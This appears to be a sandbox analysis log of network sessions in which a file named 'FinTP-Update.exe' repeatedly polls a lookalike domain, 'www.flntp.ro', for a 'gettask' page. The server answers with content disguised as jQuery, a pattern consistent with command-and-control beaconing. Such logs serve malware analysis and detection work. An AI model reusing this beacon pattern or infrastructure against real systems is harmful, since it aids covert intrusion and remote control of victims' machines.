                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:24 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:24 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            32 | 192.168.2.5 | 49886 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:26 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:27 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:26 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:27 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            33 | 192.168.2.5 | 49892 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:28 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:29 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:29 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:29 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            34 | 192.168.2.5 | 49898 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:30 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:31 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:31 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:31 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            35 | 192.168.2.5 | 49905 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:33 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:33 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:33 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:33 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            36 | 192.168.2.5 | 49911 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:35 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:36 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:35 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:36 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            37 | 192.168.2.5 | 49917 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:37 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:38 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:38 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:38 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            38 | 192.168.2.5 | 49923 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:39 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:40 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:40 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:40 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            39 | 192.168.2.5 | 49929 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:42 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:42 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:42 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:42 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            40 | 192.168.2.5 | 49935 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:44 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:44 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:44 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:44 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            41 | 192.168.2.5 | 49941 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:46 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:47 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:46 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:47 UTC | 5671 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            42 | 192.168.2.5 | 49947 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:48 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:49 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:49 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:49 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            43 | 192.168.2.5 | 49953 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:50 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:51 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:51 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:51 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            44 | 192.168.2.5 | 49959 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:53 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:53 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:53 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:53 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            45 | 192.168.2.5 | 49965 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:55 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:56 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:55 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:56 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            46 | 192.168.2.5 | 49971 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:57 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:58 UTC | 235 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:58 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:58 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            47 | 192.168.2.5 | 49977 | 3.79.209.76 | 443 | 1276 | C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            2024-12-19 22:13:59 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:14:00 UTC | 235 | IN | HTTP/1.1 200 OK
